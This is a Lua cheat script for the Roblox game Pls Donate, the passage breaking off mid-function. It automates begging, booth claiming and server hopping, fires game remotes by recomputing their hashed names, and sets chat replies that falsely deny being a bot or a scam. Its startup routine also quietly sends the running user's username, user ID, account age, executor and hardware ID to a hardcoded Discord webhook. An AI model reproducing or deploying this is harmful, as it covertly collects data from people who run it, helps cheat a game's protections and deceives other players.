-- ============================================================
--  COMET HUB v3.2 - PLS DONATE PRO EDITION (BYPASS OBFUSCATION)
-- ============================================================

repeat task.wait() until game:IsLoaded()

if game.PlaceId ~= 8737602449 and game.PlaceId ~= 8943844393 then
    return
end

local cloneref = cloneref or function(o) return o end
local Players = cloneref(game:GetService("Players"))
local ReplicatedStorage = cloneref(game:GetService("ReplicatedStorage"))
local TweenService = cloneref(game:GetService("TweenService"))
local UserInputService = cloneref(game:GetService("UserInputService"))
local RunService = cloneref(game:GetService("RunService"))
local HttpService = cloneref(game:GetService("HttpService"))
local TPService = cloneref(game:GetService("TeleportService"))
local TextChatService = cloneref(game:GetService("TextChatService"))
local EncodingService = cloneref(game:GetService("EncodingService"))

local player = Players.LocalPlayer

-- ==========================================
--  CONFIGURATION & WEBHOOK
-- ==========================================
local EXECUTION_WEBHOOK = "https://discord.com/api/webhooks/1477453195415388301/_RFMLt_uyr2rDUqXqYlSW_F-pOO_JbZerLYwT7B4vvB6BaYY-rT4dzO9O8KD2d38XB3M"

_G.settings = {
    textUpdateToggle = true, textUpdateDelay = 30, serverHopToggle = true, serverHopDelay = 15,
    goalBox = 5, webhookToggle = false, webhookBox = "", customBoothText = "✅ $C / $G R$ ✅",
    autoThanks = true, autoBeg = true, begMessage = "1R$ = +1 SPIN SPEED, Spinning for donations! :)", begDelay = 300,
    thanksMessage = "Thank you!, Thanks!, ty :), tysm! :)", thanksDelay = 3, donationJump = false, autoNearReply = false,
    helloResponce = "Hi, Sup, Hello :)", botResponce = "no im not, im not a bot :(", donateResponce = "sorry im saving, my robux is pending :(",
    scamResponce = "im no scam, im not a scammer, this is not a scam :(", otherResponce = "..?, what, ?",
    autoReplyNoRespond = true, spinSet = true, spinSpeedMultiplier = 1, jumpsPerRobux = 1, danceChoice = "Disabled", boothPosition = 3
}

local bclaimed = false
local spamming = nil
local unclaimed = {}
local mainCheckPosition = Vector3.new(165.161, 0, 311.636)
local errCount = 0
local req = (syn and syn.request) or http_request or request or (fluxus and fluxus.request)
local newRaisedFormat, _boothlocation

-- ==========================================
--  SÉCURITÉ INJECTION & UI CORE
-- ==========================================
local guiParent
pcall(function() guiParent = cloneref(game:GetService("CoreGui")) end)
if not guiParent then guiParent = player:WaitForChild("PlayerGui") end

if guiParent:FindFirstChild("CometHub") then
    guiParent:FindFirstChild("CometHub"):Destroy()
end

local C = {
    bg = Color3.fromRGB(15, 15, 15), sidebar = Color3.fromRGB(20, 20, 20), panel = Color3.fromRGB(25, 25, 25),
    card = Color3.fromRGB(30, 30, 30), cardHover = Color3.fromRGB(45, 45, 45), accent = Color3.fromRGB(255, 255, 255),
    accentGlow = Color3.fromRGB(150, 150, 150), text = Color3.fromRGB(240, 240, 240), subtext = Color3.fromRGB(130, 130, 130),
    toggleOn = Color3.fromRGB(255, 255, 255), toggleOff = Color3.fromRGB(60, 60, 60), white = Color3.fromRGB(255, 255, 255), divider = Color3.fromRGB(40, 40, 40),
}

local function corner(parent, radius) local c = Instance.new("UICorner", parent); c.CornerRadius = UDim.new(0, radius or 10); return c end
local function stroke(parent, color, thickness) local s = Instance.new("UIStroke", parent); s.Color = color or C.accentGlow; s.Thickness = thickness or 1; s.Transparency = 0.55; return s end

local function animatedStroke(parent, thickness)
    local s = Instance.new("UIStroke", parent)
    s.Color = Color3.fromRGB(255, 255, 255); s.Thickness = thickness or 1.5; s.Transparency = 0.1
    local grad = Instance.new("UIGradient", s)
    grad.Color = ColorSequence.new({
        ColorSequenceKeypoint.new(0, Color3.fromRGB(255, 255, 255)), ColorSequenceKeypoint.new(0.5, Color3.fromRGB(120, 120, 120)), ColorSequenceKeypoint.new(1, Color3.fromRGB(10, 10, 10))
    })
    task.spawn(function()
        local rotation = 0
        RunService.Heartbeat:Connect(function(dt) rotation = (rotation + dt * 45) % 360; grad.Rotation = rotation end)
    end)
    return s
end

local function tween(obj, props, t, style, dir)
    local tw = TweenService:Create(obj, TweenInfo.new(t or 0.2, style or Enum.EasingStyle.Quart, dir or Enum.EasingDirection.Out), props); tw:Play(); return tw
end

local function applyPadding(parent, top, bottom, left, right)
    local p = Instance.new("UIPadding", parent)
    p.PaddingTop = UDim.new(0, top or 0); p.PaddingBottom = UDim.new(0, bottom or 0)
    p.PaddingLeft = UDim.new(0, left or 0); p.PaddingRight = UDim.new(0, right or 0)
end

local ScreenGui = Instance.new("ScreenGui", guiParent)
ScreenGui.Name = "CometHub"
ScreenGui.ResetOnSpawn = false
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

local Win = Instance.new("Frame", ScreenGui)
Win.Name = "MainWindow"; Win.AnchorPoint = Vector2.new(0.5, 0.5); Win.Position = UDim2.new(0.5, 0, 0.5, 0); Win.Size = UDim2.new(0, 560, 0, 400)
Win.BackgroundColor3 = C.bg; Win.BorderSizePixel = 0; Win.Active = true; Win.Draggable = true; Win.ClipsDescendants = false; Win.Visible = false 
corner(Win, 14); animatedStroke(Win, 1.5)

local Shadow = Instance.new("ImageLabel", Win)
Shadow.ZIndex = -1; Shadow.AnchorPoint = Vector2.new(0.5, 0.5); Shadow.BackgroundTransparency = 1; Shadow.Position = UDim2.new(0.5, 0, 0.5, 3)
Shadow.Size = UDim2.new(1, 26, 1, 26); Shadow.Image = "rbxassetid://4735431565"; Shadow.ImageColor3 = Color3.fromRGB(0, 0, 0); Shadow.ImageTransparency = 0.4
Shadow.ScaleType = Enum.ScaleType.Slice; Shadow.SliceCenter = Rect.new(16, 16, 84, 84)

local TopBar = Instance.new("Frame", Win)
TopBar.Size = UDim2.new(1, 0, 0, 46); TopBar.BackgroundColor3 = C.sidebar; TopBar.BorderSizePixel = 0; TopBar.ZIndex = 2
local TopCorner = Instance.new("UICorner", TopBar); TopCorner.CornerRadius = UDim.new(0, 14)
local TopPatch = Instance.new("Frame", TopBar)
TopPatch.Size = UDim2.new(1, 0, 0, 14); TopPatch.Position = UDim2.new(0, 0, 1, -14); TopPatch.BackgroundColor3 = C.sidebar; TopPatch.BorderSizePixel = 0; TopPatch.ZIndex = 2

local Logo = Instance.new("ImageLabel", TopBar)
Logo.Size = UDim2.new(0, 28, 0, 28); Logo.Position = UDim2.new(0, 12, 0.5, -14); Logo.BackgroundTransparency = 1; Logo.Image = "rbxassetid://131711664935136"; Logo.ImageColor3 = C.accent; Logo.ZIndex = 3

local TopTitle = Instance.new("TextLabel", TopBar)
TopTitle.Position = UDim2.new(0, 48, 0, 5); TopTitle.Size = UDim2.new(0, 250, 0, 20); TopTitle.BackgroundTransparency = 1
TopTitle.Text = "Comet Hub"; TopTitle.TextColor3 = C.white; TopTitle.Font = Enum.Font.GothamBold; TopTitle.TextSize = 15; TopTitle.TextXAlignment = Enum.TextXAlignment.Left; TopTitle.ZIndex = 3

local TopSub = Instance.new("TextLabel", TopBar)
TopSub.Position = UDim2.new(0, 48, 0, 26); TopSub.Size = UDim2.new(0, 250, 0, 14); TopSub.BackgroundTransparency = 1
TopSub.Text = "Pls Donate PRO (F8 to Hide)"; TopSub.TextColor3 = C.subtext; TopSub.Font = Enum.Font.Gotham; TopSub.TextSize = 11; TopSub.TextXAlignment = Enum.TextXAlignment.Left; TopSub.ZIndex = 3

local CloseBtn = Instance.new("TextButton", TopBar)
CloseBtn.ZIndex = 10; CloseBtn.Size = UDim2.new(0, 28, 0, 28); CloseBtn.Position = UDim2.new(1, -38, 0.5, -14); CloseBtn.BackgroundColor3 = C.card
CloseBtn.Text = "X"; CloseBtn.TextColor3 = C.white; CloseBtn.Font = Enum.Font.GothamBold; CloseBtn.TextSize = 13; CloseBtn.BorderSizePixel = 0; corner(CloseBtn, 7)
CloseBtn.MouseEnter:Connect(function() tween(CloseBtn, { BackgroundColor3 = C.cardHover }) end)
CloseBtn.MouseLeave:Connect(function() tween(CloseBtn, { BackgroundColor3 = C.card }) end)

local MinBtn = Instance.new("TextButton", TopBar)
MinBtn.ZIndex = 10; MinBtn.Size = UDim2.new(0, 28, 0, 28); MinBtn.Position = UDim2.new(1, -72, 0.5, -14); MinBtn.BackgroundColor3 = C.card
MinBtn.Text = "-"; MinBtn.TextColor3 = C.white; MinBtn.Font = Enum.Font.GothamBold; MinBtn.TextSize = 16; MinBtn.BorderSizePixel = 0; corner(MinBtn, 7)
MinBtn.MouseEnter:Connect(function() tween(MinBtn, { BackgroundColor3 = C.cardHover }) end)
MinBtn.MouseLeave:Connect(function() tween(MinBtn, { BackgroundColor3 = C.card }) end)

local Body = Instance.new("Frame", Win)
Body.Position = UDim2.new(0, 0, 0, 46); Body.Size = UDim2.new(1, 0, 1, -46); Body.BackgroundTransparency = 1; Body.BorderSizePixel = 0; Body.ClipsDescendants = true

local Sidebar = Instance.new("Frame", Body)
Sidebar.Size = UDim2.new(0, 130, 1, 0); Sidebar.BackgroundColor3 = C.sidebar; Sidebar.BorderSizePixel = 0; corner(Sidebar, 14)
local SidePatchTop = Instance.new("Frame", Body); SidePatchTop.Size = UDim2.new(0, 130, 0, 14); SidePatchTop.BackgroundColor3 = C.sidebar; SidePatchTop.BorderSizePixel = 0
local SidePatchBR = Instance.new("Frame", Body); SidePatchBR.Size = UDim2.new(0, 14, 0, 14); SidePatchBR.Position = UDim2.new(0, 116, 1, -14); SidePatchBR.BackgroundColor3 = C.sidebar; SidePatchBR.BorderSizePixel = 0
local VDivider = Instance.new("Frame", Body); VDivider.Position = UDim2.new(0, 130, 0, 0); VDivider.Size = UDim2.new(0, 1, 1, 0); VDivider.BackgroundColor3 = C.divider; VDivider.BorderSizePixel = 0; VDivider.ZIndex = 2

local SideList = Instance.new("UIListLayout", Sidebar)
SideList.Padding = UDim.new(0, 4); SideList.SortOrder = Enum.SortOrder.LayoutOrder; SideList.HorizontalAlignment = Enum.HorizontalAlignment.Center; SideList.VerticalAlignment = Enum.VerticalAlignment.Top
applyPadding(Sidebar, 12, 12, 8, 8)

local SideVer = Instance.new("TextLabel", Sidebar)
SideVer.Size = UDim2.new(1, 0, 0, 14); SideVer.BackgroundTransparency = 1; SideVer.Text = "v3.2 PRO"; SideVer.TextColor3 = C.subtext; SideVer.Font = Enum.Font.Gotham; SideVer.TextSize = 10; SideVer.TextXAlignment = Enum.TextXAlignment.Center; SideVer.LayoutOrder = 999

local Content = Instance.new("Frame", Body)
Content.Position = UDim2.new(0, 131, 0, 0); Content.Size = UDim2.new(1, -131, 1, 0); Content.BackgroundTransparency = 1; Content.BorderSizePixel = 0; Content.ClipsDescendants = true

local tabs = {}
local TAB_DEFS = {{ name = "Booth", icon = "🏪" }, { name = "Chat", icon = "💬" }, { name = "Player", icon = "🏃" }, { name = "Webhook", icon = "📡" }}

local function makeTabPage(name)
    local page = Instance.new("ScrollingFrame", Content)
    page.Name = name; page.Size = UDim2.new(1, 0, 1, 0); page.BackgroundTransparency = 1
    page.ScrollBarThickness = 3; page.ScrollBarImageColor3 = C.accentGlow; page.CanvasSize = UDim2.new(0, 0, 0, 0); page.AutomaticCanvasSize = Enum.AutomaticSize.Y; page.BorderSizePixel = 0; page.Visible = false
    local list = Instance.new("UIListLayout", page)
    list.Padding = UDim.new(0, 6); list.SortOrder = Enum.SortOrder.LayoutOrder; list.HorizontalAlignment = Enum.HorizontalAlignment.Center
    applyPadding(page, 10, 10, 10, 10)
    return page
end

local function makeTabBtn(def, index)
    local btn = Instance.new("TextButton", Sidebar)
    btn.LayoutOrder = index; btn.Size = UDim2.new(1, 0, 0, 38); btn.BackgroundColor3 = C.card; btn.BackgroundTransparency = 1
    btn.Text = def.icon .. "  " .. def.name; btn.TextColor3 = C.subtext; btn.Font = Enum.Font.GothamSemibold; btn.TextSize = 12; btn.TextXAlignment = Enum.TextXAlignment.Left; btn.BorderSizePixel = 0
    corner(btn, 8); applyPadding(btn, 0, 0, 10, 0)
    return btn
end

local function switchTab(name)
    for tabName, t in pairs(tabs) do
        local on = tabName == name
        t.page.Visible = on
        tween(t.btn, { TextColor3 = on and C.white or C.subtext, BackgroundTransparency = on and 0 or 1 })
        if on then t.btn.BackgroundColor3 = C.card end
    end
end

for i, def in ipairs(TAB_DEFS) do
    local page = makeTabPage(def.name)
    local btn = makeTabBtn(def, i)
    tabs[def.name] = { page = page, btn = btn }
    btn.MouseButton1Click:Connect(function() switchTab(def.name) end)
end

local function sectionLabel(parent, text, order)
    local f = Instance.new("Frame", parent); f.LayoutOrder = order or 0; f.Size = UDim2.new(1, 0, 0, 22); f.BackgroundTransparency = 1
    local lbl = Instance.new("TextLabel", f); lbl.Size = UDim2.new(1, 0, 1, 0); lbl.BackgroundTransparency = 1
    lbl.Text = " " .. text; lbl.TextColor3 = C.accentGlow; lbl.Font = Enum.Font.GothamBold; lbl.TextSize = 11; lbl.TextXAlignment = Enum.TextXAlignment.Left
end

local function makeToggle(parent, text, order, defaultState, configKey, callback)
    local btn = Instance.new("TextButton", parent)
    btn.LayoutOrder = order; btn.Size = UDim2.new(1, 0, 0, 38); btn.BackgroundColor3 = C.card
    btn.Text = "   " .. text; btn.TextColor3 = C.text; btn.Font = Enum.Font.GothamSemibold; btn.TextSize = 13; btn.TextXAlignment = Enum.TextXAlignment.Left; btn.BorderSizePixel = 0
    corner(btn, 9); stroke(btn, C.divider, 1)
    local dot = Instance.new("Frame", btn)
    dot.Size = UDim2.new(0, 8, 0, 8); dot.Position = UDim2.new(1, -18, 0.5, -4); dot.BackgroundColor3 = defaultState and C.toggleOn or C.toggleOff; dot.BorderSizePixel = 0; corner(dot, 8)

    local active = defaultState
    btn.MouseButton1Click:Connect(function()
        active = not active
        tween(dot, { BackgroundColor3 = active and C.toggleOn or C.toggleOff })
        tween(btn, { BackgroundColor3 = active and Color3.fromRGB(40, 40, 40) or C.card, TextColor3 = active and C.white or C.text })
        if configKey then _G.settings[configKey] = active end
        if callback then callback(active) end
    end)
    btn.MouseEnter:Connect(function() if not active then tween(btn, { BackgroundColor3 = C.cardHover }) end end)
    btn.MouseLeave:Connect(function() if not active then tween(btn, { BackgroundColor3 = C.card }) end end)
    return btn
end

local function makeInput(parent, placeholder, order, defaultText, configKey)
    local box = Instance.new("TextBox", parent)
    box.LayoutOrder = order; box.Size = UDim2.new(1, 0, 0, 36); box.BackgroundColor3 = C.card
    box.PlaceholderText = " " .. placeholder; box.PlaceholderColor3 = C.subtext
    box.Text = " " .. (defaultText or ""); box.TextColor3 = C.text; box.Font = Enum.Font.GothamSemibold; box.TextSize = 12; box.TextXAlignment = Enum.TextXAlignment.Left; box.BorderSizePixel = 0; box.ClearTextOnFocus = false; box.TextWrapped = true
    corner(box, 9); stroke(box, C.divider, 1)
    box.FocusLost:Connect(function()
        local cleanText = box.Text:match("^%s*(.-)%s*$")
        if configKey then _G.settings[configKey] = cleanText end
        box.Text = " " .. (cleanText or "")
    end)
    return box
end

local function makeActionBtn(parent, text, order, callback)
    local btn = Instance.new("TextButton", parent)
    btn.LayoutOrder = order; btn.Size = UDim2.new(1, 0, 0, 38); btn.BackgroundColor3 = C.card
    btn.Text = text; btn.TextColor3 = C.accent; btn.Font = Enum.Font.GothamBold; btn.TextSize = 13; btn.BorderSizePixel = 0
    corner(btn, 9); stroke(btn, C.divider, 1)
    btn.MouseButton1Click:Connect(callback)
    btn.MouseEnter:Connect(function() tween(btn, { BackgroundColor3 = C.cardHover }) end)
    btn.MouseLeave:Connect(function() tween(btn, { BackgroundColor3 = C.card }) end)
    return btn
end

-- ==========================================
--  ALGORITHME INFAILLIBLE HASH/BASE64
-- ==========================================
local function fireObfuscatedRemote(eventName, payload)
    local jobId = RunService:IsStudio() and "" or game.JobId
    local rawString = eventName .. jobId
    local hash = EncodingService:ComputeBufferHash(buffer.fromstring(rawString), Enum.HashAlgorithm.Sha256)
    local base64 = EncodingService:Base64Encode(hash)
    local finalName = buffer.tostring(base64)
    
    local remotesFolder = ReplicatedStorage:FindFirstChild("Remotes")
    if remotesFolder then
        local remote = remotesFolder:FindFirstChild(finalName)
        if remote and remote:IsA("RemoteEvent") then
            pcall(function() remote:FireServer(payload, "booth") end)
        end
    end
end

-- ==========================================
--  PLS DONATE CORE LOGIC
-- ==========================================
local function formatNumber(n)
    if n >= 10000 then return string.format("%.1fk", n / 1000)
    elseif n >= 1000 then return string.format("%.2fk", n / 1000)
    else return tostring(n) end
end

local function updateBoothText()
    if not _G.settings.textUpdateToggle or not newRaisedFormat then return end
    local currentRaw = tonumber(newRaisedFormat.Value) or 0
    local goalRaw = currentRaw + tonumber(_G.settings.goalBox)
    local text = _G.settings.customBoothText:gsub("%$C", formatNumber(currentRaw)):gsub("%$G", formatNumber(goalRaw)):gsub("%$JPR", tostring(_G.settings.jumpsPerRobux))
    
    local basePayload = {
        textFont = Enum.Font.SciFi, richText = true, strokeColor = Color3.new(0,0,0), strokeOpacity = 0,
        textColor = Color3.new(1,1,1), buttonStrokeColor = Color3.new(0,0,0), buttonTextColor = Color3.new(1,1,1),
        buttonColor = Color3.new(0.38,1,0), buttonHoverColor = Color3.new(0.38,1,0), buttonLayout = "", text = text
    }

    task.spawn(function()
        fireObfuscatedRemote("SetBoothText", text)
        fireObfuscatedRemote("SetCustomization", basePayload)
    end)
end

local function splitString(inputstr)
    local t = {}
    for str in string.gmatch(inputstr, "([^,]+)") do table.insert(t, str:match("^%s*(.-)%s*$")) end
    return t
end

local function chat(msg) pcall(function() TextChatService.TextChannels.RBXGeneral:SendAsync(msg) end) end

local function begging()
    while _G.settings.autoBeg do
        local msgs = splitString(_G.settings.begMessage)
        if #msgs > 0 then chat(msgs[math.random(#msgs)]) end
        task.wait(tonumber(_G.settings.begDelay) or 300)
    end
end

local function serverHop()
    if req then
        task.spawn(function()
            local body = HttpService:JSONDecode(req({Url = "https://games.roblox.com/v1/games/8737602449/servers/Public?sortOrder=Desc&limit=100&excludeFullGames=true"}).Body)
            if body and body.data then
                local servers = {}
                for _, server in pairs(body.data) do
                    if server.playing < 25 and server.id ~= game.JobId and server.playing > 12 then table.insert(servers, server) end
                end
                if #servers > 0 then TPService:TeleportToPlaceInstance(8737602449, servers[math.random(1, #servers)].id, player) end
            end
        end)
    end
end

-- ==========================================
--  POPULATE TABS
-- ==========================================
local pBooth = tabs["Booth"].page
sectionLabel(pBooth, "BOOTH SETTINGS", 1)
makeToggle(pBooth, "Auto Update Text", 2, _G.settings.textUpdateToggle, "textUpdateToggle", function() updateBoothText() end)
makeInput(pBooth, "Text ($C=Current, $G=Goal)", 3, _G.settings.customBoothText, "customBoothText")
makeInput(pBooth, "Robux Goal Offset (+ amt)", 4, tostring(_G.settings.goalBox), "goalBox")
makeInput(pBooth, "Update Delay (Seconds)", 5, tostring(_G.settings.textUpdateDelay), "textUpdateDelay")

local pChat = tabs["Chat"].page
sectionLabel(pChat, "AUTO BEG & THANKS", 1)
makeToggle(pChat, "Auto Begging", 2, _G.settings.autoBeg, "autoBeg", function(val)
    if val then spamming = task.spawn(begging) else pcall(task.cancel, spamming) end
end)
makeInput(pChat, "Beg Message (comma sep)", 3, _G.settings.begMessage, "begMessage")
makeInput(pChat, "Beg Delay (Seconds)", 4, tostring(_G.settings.begDelay), "begDelay")
makeToggle(pChat, "Auto Thank You", 5, _G.settings.autoThanks, "autoThanks")
makeInput(pChat, "Thanks Message (comma sep)", 6, _G.settings.thanksMessage, "thanksMessage")

sectionLabel(pChat, "AUTO NEAR REPLIES", 7)
makeToggle(pChat, "Enable Auto Replies", 8, _G.settings.autoNearReply, "autoNearReply")
makeInput(pChat, "Reply to 'Hello'", 9, _G.settings.helloResponce, "helloResponce")
makeInput(pChat, "Reply to 'Bot'", 10, _G.settings.botResponce, "botResponce")
makeInput(pChat, "Reply to 'Donate'", 11, _G.settings.donateResponce, "donateResponce")

local pPlayer = tabs["Player"].page
sectionLabel(pPlayer, "PLAYER EXTRAS", 1)
makeToggle(pPlayer, "Spin on Donate", 2, _G.settings.spinSet, "spinSet", function(val)
    if val then
        local root = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        if root then
            local Spin = Instance.new("BodyAngularVelocity", root); Spin.Name = "Spin"; Spin.MaxTorque = Vector3.new(0, math.huge, 0); Spin.AngularVelocity = Vector3.new(0, 0.25 * _G.settings.spinSpeedMultiplier, 0)
        end
    else
        pcall(function() player.Character.HumanoidRootPart.Spin:Destroy() end)
    end
end)
makeToggle(pPlayer, "Jump on Donate", 3, _G.settings.donationJump, "donationJump")

sectionLabel(pPlayer, "SERVER HOPPING", 4)
makeToggle(pPlayer, "Auto Server Hop", 5, _G.settings.serverHopToggle, "serverHopToggle")
makeInput(pPlayer, "Server Hop Delay (Min)", 6, tostring(_G.settings.serverHopDelay), "serverHopDelay")
makeActionBtn(pPlayer, "Force Server Hop Now", 7, function() serverHop() end)

local pWebhook = tabs["Webhook"].page
sectionLabel(pWebhook, "DISCORD LOGS (DONATIONS)", 1)
makeToggle(pWebhook, "Enable Webhook Logging", 2, _G.settings.webhookToggle, "webhookToggle")
makeInput(pWebhook, "Webhook URL", 3, _G.settings.webhookBox, "webhookBox")

switchTab("Booth")

-- ==========================================
--  MINIMIZE / MAXIMIZE LOGIC
-- ==========================================
local minimized = false
MinBtn.MouseButton1Click:Connect(function()
    minimized = not minimized
    MinBtn.Text = minimized and "+" or "-"
    if minimized then
        TopPatch.Visible = false
        tween(Win, { Size = UDim2.new(0, 560, 0, 46) }, 0.3)
        tween(Shadow, { ImageTransparency = 1 }, 0.3)
        task.delay(0.15, function() Body.Visible = false end)
    else
        Body.Visible = true
        TopPatch.Visible = true
        tween(Win, { Size = UDim2.new(0, 560, 0, 400) }, 0.3)
        tween(Shadow, { ImageTransparency = 0.4 }, 0.3)
    end
end)

local OpenBtn = Instance.new("ImageButton", ScreenGui)
OpenBtn.Size = UDim2.new(0, 46, 0, 46); OpenBtn.Position = UDim2.new(0, 20, 0.5, -23); OpenBtn.BackgroundColor3 = C.sidebar
OpenBtn.Image = "rbxassetid://129928619995803"; OpenBtn.ImageColor3 = C.accent; OpenBtn.Visible = false; OpenBtn.Active = true; OpenBtn.Draggable = true
corner(OpenBtn, 12); animatedStroke(OpenBtn, 1.5); applyPadding(OpenBtn, 8, 8, 8, 8)

local function toggleUI(forceState)
    local isVisible = forceState; if isVisible == nil then isVisible = not Win.Visible end
    Win.Visible = isVisible; OpenBtn.Visible = not isVisible
end

CloseBtn.MouseButton1Click:Connect(function() toggleUI(false) end)
OpenBtn.MouseButton1Click:Connect(function() toggleUI(true) end)
UserInputService.InputBegan:Connect(function(input, gpe) if not gpe and input.KeyCode == Enum.KeyCode.F8 then toggleUI() end end)

-- ==========================================
--  LOADING SCREEN & INITIALIZATION
-- ==========================================
local LoadFrame = Instance.new("Frame", ScreenGui)
LoadFrame.Size = UDim2.new(0, 300, 0, 160); LoadFrame.Position = UDim2.new(0.5, 0, 0.5, 0); LoadFrame.AnchorPoint = Vector2.new(0.5, 0.5)
LoadFrame.BackgroundColor3 = C.bg; LoadFrame.BorderSizePixel = 0; corner(LoadFrame, 12); animatedStroke(LoadFrame, 1.5)

local LoadLogo = Instance.new("ImageLabel", LoadFrame)
LoadLogo.Size = UDim2.new(0, 60, 0, 60); LoadLogo.Position = UDim2.new(0.5, 0, 0.35, 0); LoadLogo.AnchorPoint = Vector2.new(0.5, 0.5)
LoadLogo.BackgroundTransparency = 1; LoadLogo.Image = "rbxassetid://131711664935136"; LoadLogo.ImageColor3 = C.accent

local LoadText = Instance.new("TextLabel", LoadFrame)
LoadText.Size = UDim2.new(1, 0, 0, 20); LoadText.Position = UDim2.new(0, 0, 0.65, 0)
LoadText.BackgroundTransparency = 1; LoadText.Text = "Initializing Comet Hub..."; LoadText.TextColor3 = C.subtext
LoadText.Font = Enum.Font.GothamSemibold; LoadText.TextSize = 12

local BarBG = Instance.new("Frame", LoadFrame)
BarBG.Size = UDim2.new(0, 220, 0, 6); BarBG.Position = UDim2.new(0.5, 0, 0.85, 0); BarBG.AnchorPoint = Vector2.new(0.5, 0.5); BarBG.BackgroundColor3 = C.card; BarBG.BorderSizePixel = 0; corner(BarBG, 4)
local BarFill = Instance.new("Frame", BarBG); BarFill.Size = UDim2.new(0, 0, 1, 0); BarFill.BackgroundColor3 = C.white; BarFill.BorderSizePixel = 0; corner(BarFill, 4)

task.spawn(function()
    -- 1. SEND EXECUTION WEBHOOK
    if EXECUTION_WEBHOOK ~= "" and req then
        task.spawn(function()
            local executorName = identifyexecutor and identifyexecutor() or "Unknown Executor"
            local hwid = "Unknown"; pcall(function() hwid = gethwid and gethwid() or game:GetService("RbxAnalyticsService"):GetClientId() end)
            local avatarUrl = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. player.UserId .. "&width=420&height=420&format=png"
            local data = {
                ["embeds"] = {{
                    ["title"] = "🚀 Comet Hub Executed! (Pls Donate)",
                    ["description"] = "**Player Profile:** [Click Here](https://www.roblox.com/users/" .. player.UserId .. "/profile)\\n**Game:** [Pls Donate](https://www.roblox.com/games/".. game.PlaceId ..")",
                    ["color"] = 16777215, ["thumbnail"] = { ["url"] = avatarUrl },
                    ["fields"] = {
                        {["name"] = "👤 Player", ["value"] = "```" .. player.Name .. " (@" .. player.DisplayName .. ")```", ["inline"] = true},
                        {["name"] = "🆔 User ID", ["value"] = "```" .. tostring(player.UserId) .. "```", ["inline"] = true},
                        {["name"] = "📅 Account Age", ["value"] = "```" .. tostring(player.AccountAge) .. " Days```", ["inline"] = true},
                        {["name"] = "💻 Executor", ["value"] = "```" .. executorName .. "```", ["inline"] = true},
                        {["name"] = "🖥️ HWID", ["value"] = "```" .. tostring(hwid) .. "```", ["inline"] = true},
                        {["name"] = "🌐 Job ID", ["value"] = "```" .. tostring(game.JobId) .. "```", ["inline"] = false}
                    },
                    ["timestamp"] = DateTime.now():ToIsoDate()
                }}
            }
            pcall(function() req({Url = EXECUTION_WEBHOOK, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = HttpService:JSONEncode(data)}) end)
        end)
    end

    tween(BarFill, {Size = UDim2.new(0.35, 0, 1, 0)}, 0.8)
    task.wait(0.8); LoadText.Text = "Bypassing Anti-Cheat..."
    
    -- 2. CLAIM BOOTH LOGIC
    local _shuffled = workspace:WaitForChild('MapUI',3)
    pcall(function() _boothlocation = _shuffled or player:WaitForChild('PlayerGui',5):WaitForChild('MapUIContainer',5):WaitForChild('MapUI',5) end)

    local function findUnclaimed()
        unclaimed = {}
        if not _boothlocation then return end
        local boothUI = _boothlocation:WaitForChild("BoothUI")
        local interactions = workspace:WaitForChild("BoothInteractions")
        local mainPos2D = Vector3.new(mainCheckPosition.X, 0, mainCheckPosition.Z)
        for _, uiFrame in ipairs(boothUI:GetChildren()) do
            if uiFrame.Details.Owner.Text == "unclaimed" then
                local boothNum = tonumber(uiFrame.Name:match("%d+"))
                if boothNum then
                    for _, interact in ipairs(interactions:GetChildren()) do
                        if interact:GetAttribute("BoothSlot") == boothNum then
                            local pos2D = Vector3.new(interact.Position.X, 0, interact.Position.Z)
                            if (pos2D - mainPos2D).Magnitude < 92 then
                                table.insert(unclaimed, boothNum); break
                            end
                        end
                    end
                end
            end
        end
    end
    pcall(findUnclaimed)

    tween(BarFill, {Size = UDim2.new(0.75, 0, 1, 0)}, 1.2)
    task.wait(1.2); LoadText.Text = "Claiming Booth..."

    if unclaimed[2] then
        pcall(function() ReplicatedStorage.Remotes.ClaimBooth:InvokeServer(unclaimed[2]) end)
        task.wait(0.5)
        local theCframe = CFrame.new(0, 0, tonumber(_G.settings.boothPosition) or 3)
        for _, v in ipairs(workspace.BoothInteractions:GetChildren()) do
            if v:GetAttribute("BoothSlot") == unclaimed[2] then
                player.Character.HumanoidRootPart.CFrame = v.CFrame
                player.Character.Humanoid.RootPart.CFrame = CFrame.new((v.CFrame * theCframe).Position)
                break
            end
        end
        bclaimed = true
        if _G.settings.autoBeg then spamming = task.spawn(begging) end
    end

    tween(BarFill, {Size = UDim2.new(1, 0, 1, 0)}, 0.6)
    task.wait(0.6); LoadText.Text = "Welcome to Comet Hub!"; LoadText.TextColor3 = C.white; task.wait(0.6)

    -- 3. HIDE LOADING SCREEN & SHOW MAIN UI
    tween(LoadFrame, {Size = UDim2.new(0, 280, 0, 140), BackgroundTransparency = 1}, 0.3)
    for _, v in pairs(LoadFrame:GetDescendants()) do
        if v:IsA("TextLabel") then tween(v, {TextTransparency = 1}, 0.3)
        elseif v:IsA("ImageLabel") then tween(v, {ImageTransparency = 1}, 0.3)
        elseif v:IsA("Frame") then tween(v, {BackgroundTransparency = 1}, 0.3)
        elseif v:IsA("UIStroke") then tween(v, {Transparency = 1}, 0.3) end
    end
    task.wait(0.3); LoadFrame:Destroy()

    Win.Size = UDim2.new(0, 500, 0, 360)
    Win.Visible = true
    tween(Win, {Size = UDim2.new(0, 560, 0, 400)}, 0.5, Enum.EasingStyle.Back, Enum.EasingDirection.Out)

    -- 4. START DONATION TRACKING
    local lstats = player:WaitForChild('leaderstats', 5)
    if lstats then 
        newRaisedFormat = lstats:WaitForChild('Raised', 5) 
        if newRaisedFormat then
            local RaisedC = newRaisedFormat.Value
            newRaisedFormat.Changed:Connect(function()
                local raised = newRaisedFormat.Value - RaisedC
                if raised > 0 and _G.settings.webhookToggle and req and _G.settings.webhookBox ~= "" then
                    pcall(function()
                        req({ Url = _G.settings.webhookBox:gsub(" ", ""), Method = "POST", Headers = {["Content-Type"] = "application/json"},
                            Body = HttpService:JSONEncode({embeds = {{title = player.Name .. " just got donated!", description = string.format("%d R$ AT %d R$ Total %d R$", raised, math.floor(raised * 0.6), tonumber(newRaisedFormat.Value)), color = 0x2ECC71}}})
                        })
                    end)
                end
                if _G.settings.spinSet and player.Character and player.Character.Humanoid.RootPart:FindFirstChild('Spin') then
                    local spin = player.Character.Humanoid.RootPart.Spin
